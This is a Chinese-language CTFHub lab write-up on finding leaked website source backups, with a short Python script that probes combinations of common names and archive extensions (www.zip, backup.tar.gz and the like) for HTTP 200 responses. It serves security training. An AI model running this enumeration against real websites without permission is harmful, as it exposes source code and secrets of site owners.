web-信息泄露-备份文件下载-网站源码

合集 - ctfhub(3)

1.请求方式2024-07-152.重定向2024-07-15

3.web-信息泄露-备份文件下载-网站源码2024-07-15

收起

当开发人员在线上环境中对源代码进行了备份操作，并且将备份文件放在了 web 目录下，就会引起网站源码泄露

将上面的常见后缀和文件名进行排列组合即可得到文件

手动输入

在url的末尾输入类似于 /index.php.bak

逐个尝试直到有下载框

下载下来里面并没有flag明文，但是标题写的仍然是flag_xx.txt，尝试在网站上打开该文件

 

python

import requests
 
url1 = 'url'
 
# url为被扫描地址
 
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
 
list2 = ['tar', 'tar.gz', 'zip', 'rar']
 
for i in list1:
 
    for j in list2:
 
        back = str(i) + '.' + str(j)
 
        url = str(url1) + '/' + back
 
        print(back + '    ', end='')
 
        print(requests.get(url).status_code)

找到响应是200的